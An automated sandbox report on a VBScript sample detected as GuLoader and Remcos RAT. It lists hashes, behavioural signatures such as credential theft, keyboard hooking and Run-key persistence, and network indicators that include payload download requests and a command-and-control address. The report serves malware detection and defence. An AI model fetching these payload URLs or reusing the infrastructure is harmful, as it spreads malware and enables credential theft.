Windows Analysis Report
REVISED NEW ORDER 7936-2024.vbs

Overview

General Information

Sample name: REVISED NEW ORDER 7936-2024.vbs
Analysis ID: 1435459
MD5: 7c07b76a5587795f4b9a2e8c129f656d
SHA1: 9296b93c2fc2222407146bda21603d454c339c73
SHA256: 720d5e29e7249eea52bd04ba585b9e18908356bbc3cea37920f44b1673ca9ef6
Tags: vbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: paygateme.net Virustotal: Detection: 19% Perma Link
Source: http://87.121.105.184/sviLEH127.bin Virustotal: Detection: 18% Perma Link
Source: http://87.121.105.184/Udvejningernes.aaf Virustotal: Detection: 16% Perma Link
Source: Yara match File source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2318647454.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdbj source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb= source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 146.70.57.34:2286
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 87.121.105.184 87.121.105.184
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 146.70.57.34 146.70.57.34
Source: global traffic HTTP traffic detected: GET /Udvejningernes.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sviLEH127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.184
Source: global traffic HTTP traffic detected: GET /Udvejningernes.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sviLEH127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: paygateme.net
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000001.00000002.2525142597.000002B7A85E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2525142597.000002B7AA384000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184
Source: powershell.exe, 00000001.00000002.2525142597.000002B7A83F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184/Udvejningernes.aafP
Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.184/Udvejningernes.aafXR
Source: powershell.exe, 00000001.00000002.2525142597.000002B7AA384000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
Source: wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
Source: wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748349554.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.1747324046.000001ABE6757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747681142.000001ABE6758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748349554.000001ABE6758000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enndows
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: powershell.exe, 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
